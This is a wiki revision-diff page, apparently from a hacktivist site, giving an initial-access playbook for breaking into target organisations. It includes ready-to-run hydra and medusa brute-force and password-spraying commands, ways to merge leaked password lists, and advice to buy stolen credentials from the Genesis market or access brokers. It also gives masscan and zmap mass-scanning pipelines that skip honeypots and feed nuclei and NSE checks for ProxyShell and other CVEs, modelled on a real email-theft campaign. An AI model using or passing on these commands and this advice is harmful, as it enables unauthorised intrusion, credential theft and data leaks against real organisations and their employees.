Initial Access Tactics, techniques and procedures: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
(33 intermediate revisions by the same user not shown)
Line 25: Line 25:


=== Username creation based on recon/osint ===
=== Username creation based on recon/osint ===
Create a bespoke username word list based on OSINT, recon and your targets employee LinkedIn and other social media pofiles to aid in your password attacks.
* https://github.com/Mebus/cupp
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/digininja/RSMangler
Line 36: Line 38:


=== Passwords ===
=== Passwords ===
Common and leaked credentials to test login portals and network services.
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
Using seclists usernames and passwords output all username and password files into one big file:
Usernames:
<code>find SecLists/Usernames/ -type f -exec cat {} + > usernames.txt</code>
Passwords:
<code>find SecLists/Passwords/ -type f -exec cat {} + > passwords.txt</code>
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
* https://github.com/ihebski/DefaultCreds-cheat-sheet
* https://github.com/ihebski/DefaultCreds-cheat-sheet
Line 46: Line 59:
* https://www.kali.org/tools/patator
* https://www.kali.org/tools/patator
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/hydra
A basic example using a wordlist in the format of email:pass/user:pass. <code>hydra -C creds.txt target.com -s 443 http-post-form "/login:username=^USER^&password=^PASS^:These credentials do not match our records." -S</code>
A basic example using a wordlist in the format of email:pass/user:pass.  
 
<code>hydra -C creds.txt target.com -s 443 http-post-form "/login:username=^USER^&password=^PASS^:These credentials do not match our records." -S</code>
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/brutespray


Line 52: Line 67:
* https://github.com/khast3x/h8mail [Free but includes paid services]
* https://github.com/khast3x/h8mail [Free but includes paid services]


=== Services ===
==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.


* https://haveibeenpwned.com
* https://haveibeenpwned.com
Line 62: Line 79:


=== Buying access ===
=== Buying access ===
'''[https://www.nationalcrimeagency.gov.uk/news/notorious-criminal-marketplace-selling-victim-identities-taken-down-in-international-operation WARNING!] The genesis market has been seized by the authorities. They do operate a v3 Tor onion address however it's unclear whether or not the feds have back-end access to the market so for safety we won't list it here. [https://archive.ph/BcFgs Genesis admin response.]'''


You can use the genesis market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.
You can use the genesis market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.
* https://genesis.market/guest/login/index [Paid]
* http://genesis7zoveavupiiwnrycmaq6uro3kn5h2be3el7wdnbjti2ln2wid.onion/guest/login [Paid]


You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).
Line 73: Line 89:


=== Password spraying ===
=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.
* https://github.com/dafthack/MSOLSpray
* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
Line 79: Line 97:
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper
* https://github.com/dafthack/MailSniper
* <code>hydra -L usernames.txt -p Spring2023 10.10.10.13 rdp</code>
* <code>medusa -U usernames.txt -p [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst Spring2023] -H targets.txt -M ssh -O results.txt</code>


=== Hash cracking ===
=== Hash cracking ===
Crack password hashes using both online and offline tools!
Identify hash:
* https://github.com/blackploit/hash-identifier
Online tools:
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net
* https://crackstation.net
Offline tools:
* https://github.com/hashcat/hashcat
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules
== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or our target companies IP ranges for critical vulnerabilities and attack protocols with a dictionary attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target emails out of their Microsoft exchange email servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then scan the IP addresses you discover. You can resolve the IP addresses to their respective domains (reverse DNS lookup) using <code>nmap -Pn -sS -R -iL targets.txt -oA results</code>, however this is also done by default when performing a vulnerability scan using NSE.


== Targeted spray and pray ==
=== Vulnerability scanning ===
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or our target companies IP ranges for critical vulnerabilities and grep out targeted domains. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target emails out of their Microsoft exchange email servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then scan the IP addresses you discover. You can resolve the IP addresses to their respective domains (reverse DNS lookup) using <code>nmap -Pn -sS -R -iL targets.txt -oA results</code>, however this is also done by default when performing a vulnerability scan using NSE.
Scanning for and exploiting CVE vulnerabilities on public facing applications.


==== Tools ====
==== Tools ====
Line 94: Line 123:
Scan IP ranges, output only ipv4 addresses and block known honeypots:
Scan IP ranges, output only ipv4 addresses and block known honeypots:
   
   
<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 3000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 20000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>


Add unique port numbers to the end of discovered IPs in the format: 10.10.10.12:443
Add the port numbers to the end of discovered IPs in the format: ip-address:443


<code>sed -i 's/$/:443/' results.txt</code>
<code>sed -i 's/$/:443/' results.txt</code>
Line 102: Line 131:
[https://www.bleepingcomputer.com/news/security/researchers-compile-list-of-vulnerabilities-abused-by-ransomware-gangs Vuln] scan IPs:
[https://www.bleepingcomputer.com/news/security/researchers-compile-list-of-vulnerabilities-abused-by-ransomware-gangs Vuln] scan IPs:


<code>nuclei -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2021/CVE-2021-34473.yaml nuclei-templates/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>
<code>nuclei -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>
 
Scan for multiple different ports:
 
<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 20000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
 
Add unique port numbers to the end of discovered IPs in the format: ip-address:port
 
<code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
 
[https://www.ic3.gov/Media/News/2021/210402.pdf Vuln] scan IPs:
 
<code>nuclei -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>


* https://github.com/zmap/zmap
* https://github.com/zmap/zmap
[https://enlacehacktivista.org/hackback2.webm Guacamaya] scanning for proxyshell using zmap:  
[https://enlacehacktivista.org/hackback2.webm Guacamaya] scanning for proxyshell using zmap and [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]:  
<pre>
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
Line 114: Line 155:
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>
</pre>
=== Password attacks ===
You can perform these attacks against protocols such as SSH, RDP, FTP, telnet, VNC, mysql.
==== Tools ====
* https://www.kali.org/tools/medusa
Scan your target(s) for RDP (3389):
<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 20000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > targets.txt</code>
Dictionary attack:
<code>medusa -U usernames.txt -P passwords.txt -H targets.txt -M rdp -O results.txt</code>

Revision as of 13:47, 28 May 2023

Phishing

Phishing is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious email attachment or click on a malicious link. As hacktivists we want to find away to gain entry inside the targets network as quickly and easily as possible to leak documents, expose lies and corruption and free the truth!

Tools

Password Attacks

Groups like Lapsus$ show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of Uber, Rockstar games, Okta and so on then they will work on our hacktivist targets!

If your target uses multi-factor authentication you can try either social engineering or MFA fatigue.

Username creation based on recon/osint

Create a bespoke username word list based on OSINT, recon and your targets employee LinkedIn and other social media pofiles to aid in your password attacks.

Passwords

Common and leaked credentials to test login portals and network services.

Using seclists usernames and passwords output all username and password files into one big file:

Usernames:

find SecLists/Usernames/ -type f -exec cat {} + > usernames.txt

Passwords:

find SecLists/Passwords/ -type f -exec cat {} + > passwords.txt

Password cracking tools

A basic example using a wordlist in the format of email:pass/user:pass.

hydra -C creds.txt target.com -s 443 http-post-form "/login:username=^USER^&password=^PASS^:These credentials do not match our records." -S

Searching leaks

Services

Please note: DO NOT use intelx[.]io as they have been seen doxing hackers in the past and block the use of Tor. AVOID!

You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

Once your leaks have been downloaded you can parse your results in the format, email:pass.

Buying access

You can use the genesis market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.

You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).

Password spraying

Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords (Spring2023) and spray them hoping an employee uses a weak and guessable credential.

Hash cracking

Crack password hashes using both online and offline tools!

Identify hash:

Online tools:

Offline tools:

Spray and pray

As seen by Guacamaya, hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or our target companies IP ranges for critical vulnerabilities and attack protocols with a dictionary attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target emails out of their Microsoft exchange email servers and leaked them. You can also do the same! See scanning and recon for tools such as nuclei and the nmap scripting engine (NSE) to then scan the IP addresses you discover. You can resolve the IP addresses to their respective domains (reverse DNS lookup) using nmap -Pn -sS -R -iL targets.txt -oA results, however this is also done by default when performing a vulnerability scan using NSE.

Vulnerability scanning

Scanning for and exploiting CVE vulnerabilities on public facing applications.

Tools

Scan IP ranges, output only ipv4 addresses and block known honeypots:

sudo masscan -Pn -sS -iL ranges.txt --rate 20000 -p443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt

Add the port numbers to the end of discovered IPs in the format: ip-address:443

sed -i 's/$/:443/' results.txt

Vuln scan IPs:

nuclei -l results.txt -t nuclei-templates/http/cves/2021/CVE-2021-34473.yaml -o vulns.txt

Scan for multiple different ports:

sudo masscan -Pn -sS -iL ranges.txt --rate 20000 -p4443,10443,8443 --open-only --excludefile block.txt --output-format list --output-file results.txt

Add unique port numbers to the end of discovered IPs in the format: ip-address:port

awk '{ print $4 ":" $3 }' results.txt > final_results.txt

Vuln scan IPs:

nuclei -l final_results.txt -t nuclei-templates/http/cves/2018/CVE-2018-13379.yaml -o vulns.txt

Guacamaya scanning for proxyshell using zmap and NSE:

sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt

Password attacks

You can perform these attacks against protocols such as SSH, RDP, FTP, telnet, VNC, mysql.

Tools

Scan your target(s) for RDP (3389):

sudo masscan -Pn -sS -iL ranges.txt --rate 20000 -p3389 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > targets.txt

Dictionary attack:

medusa -U usernames.txt -P passwords.txt -H targets.txt -M rdp -O results.txt